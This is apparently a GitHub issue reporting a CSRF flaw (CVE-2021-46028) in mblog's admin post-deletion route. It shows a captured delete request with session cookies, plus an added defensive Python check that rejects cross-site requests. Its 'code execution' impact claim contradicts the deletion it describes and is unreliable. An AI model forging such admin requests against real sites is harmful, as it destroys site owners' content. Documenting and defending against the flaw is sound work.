CVE-2021-46028: A CSRF vulnerability exists in mblog<=3.5.0 · Issue #50 · langhsu/mblog
In mblog <= 3.5.0 there is a CSRF vulnerability in the admin back-end article management. The attacker constructs a CSRF payload. Once the administrator clicks a malicious link, the article will be deleted.
[Vulnerability Type]
Cross-site request forgery (CSRF)
[Vendor of Product]
https://github.com/langhsu/mblog
[Affected Component]
GET /admin/post/delete?id=6 HTTP/1.1
Host: 127.0.0.1:8082
sec-ch-ua: "Chromium";v="91", " Not;A Brand";v="99"
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.101 Safari/537.36
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1:8082/admin/post/list
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_acc69acbc4e6d4c69ecf77725d072490=1628653260; Hm_lvt_cd8218cd51f800ed2b73e5751cb3f4f9=1629356854,1629356969; Hm_lvt_1040d081eea13b44d84a4af639640d51=1629787797; UM_distinctid=17b76ec38b042b-043bd40aca20f-3373266-e1000-17b76ec38b13f6; CNZZDATA1255091723=1621369374-1629783007-http%253A%252F%252F127.0.0.1%253A8080%252F%7C1629783007; JSESSIONID=BcGdm-4poQD-nImmtzQx_gevDCZGrfxbmnirm5hb
Connection: close
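The Sec-Fetch-Site and Referer headers in the captured request are what a server can use to tell this same-origin call from a forged cross-site one. The Python check below is an added example, not part of the report or of mblog's code; the policy, the function names and every sample request except the one trimmed from the capture are assumptions.

```python
from urllib.parse import urlsplit

TRUSTED_ORIGIN = "http://127.0.0.1:8082"   # admin origin seen in the captured request
STATE_CHANGING = {"/admin/post/delete"}    # the route named in the report

def parse_head(raw):
    """Split a raw HTTP/1.1 request head into (method, path, headers)."""
    lines = [ln for ln in raw.strip().splitlines() if ln.strip()]
    method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for ln in lines[1:]:
        name, _, value = ln.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, urlsplit(target).path, headers

def origin_of(url):
    p = urlsplit(url)
    return f"{p.scheme}://{p.netloc}"

def allow(raw):
    """Return (allowed, reason) for one request under a same-origin-only policy."""
    _method, path, headers = parse_head(raw)
    if path not in STATE_CHANGING:
        return True, "route does not change state"
    site = headers.get("sec-fetch-site")
    if site is not None:                   # set by the browser, not writable by page script
        return site == "same-origin", f"Sec-Fetch-Site: {site}"
    source = headers.get("origin") or headers.get("referer")
    if source is None:                     # nothing to judge by: fail closed
        return False, "no Sec-Fetch-Site, Origin or Referer"
    return origin_of(source) == TRUSTED_ORIGIN, f"source origin {origin_of(source)}"

# Constructed samples. LEGIT is trimmed from the request in the report;
# CROSS_SITE is the same request as a browser labels it when another site triggers it.
LEGIT = """GET /admin/post/delete?id=6 HTTP/1.1
Host: 127.0.0.1:8082
Sec-Fetch-Site: same-origin
Referer: http://127.0.0.1:8082/admin/post/list
"""
CROSS_SITE = """GET /admin/post/delete?id=6 HTTP/1.1
Host: 127.0.0.1:8082
Sec-Fetch-Site: cross-site
Referer: http://other-site.example/page
"""
# Same cross-site request from a browser that sends no Fetch Metadata headers.
LEGACY_CROSS = CROSS_SITE.replace("Sec-Fetch-Site: cross-site\n", "")

if __name__ == "__main__":
    for raw in (LEGIT, CROSS_SITE, LEGACY_CROSS):
        print(allow(raw))
```

A header check like this is defence in depth: the delete action should also stop accepting GET and require a per-session CSRF token.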
[Attack Type]
Remote
[Impact Code execution]
true
POC: